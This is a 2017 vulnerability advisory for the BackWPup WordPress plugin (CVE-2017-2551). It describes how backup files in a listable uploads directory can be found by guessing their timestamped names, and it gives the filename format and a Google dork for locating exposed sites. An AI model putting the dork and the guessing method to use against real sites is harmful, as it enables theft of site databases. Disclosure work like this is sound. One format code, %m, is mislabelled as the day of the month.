Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download |
Author: Larry W. Cashdollar, @_larry0 |
Date: 2017-09-08 |
CVE-ID:[CVE-2017-2551] |
CWE: CWE-552 Files or Directories Accessible to External Parties |
Download Site: https://wordpress.org/plugins/backwpup |
Vendor: Inpsyde |
Vendor Notified: 2017-09-08 |
Vendor Contact: plugins@wordpress.org |
Advisory: http://www.vapidlabs.com/advisory.php?v=201 |
Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more." |
Vulnerability: There is a weakness in the way backwpup creates and stores the backup files it generates. It creates a random string to obscure the location, but
it uses that same string to create the storage directory under wp-content/uploads/ which in most installations of WordPress allows file listings.
Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file as its structure is just a date and time stamp. It would take a Maximum of 86400 tries to guess if a backup is available for that day.
Filename format:
backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s
Default settings are:
%d = Two digit day of the month, with leading zeros
%m = Day of the month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second
https://wordpress.org/plugins/backwpup
I have an exploit available if you're interested.
|
Export: JSON TEXT XML |
Exploit Code:
|
Screen Shots: |
Notes: Google Dork: inurl:wp-content/uploads/backwpup |
Larry W. Cashdollar
Larry Cashdollar
Larry W. Cashdollar vulnerability
Larry Cashdollar advisory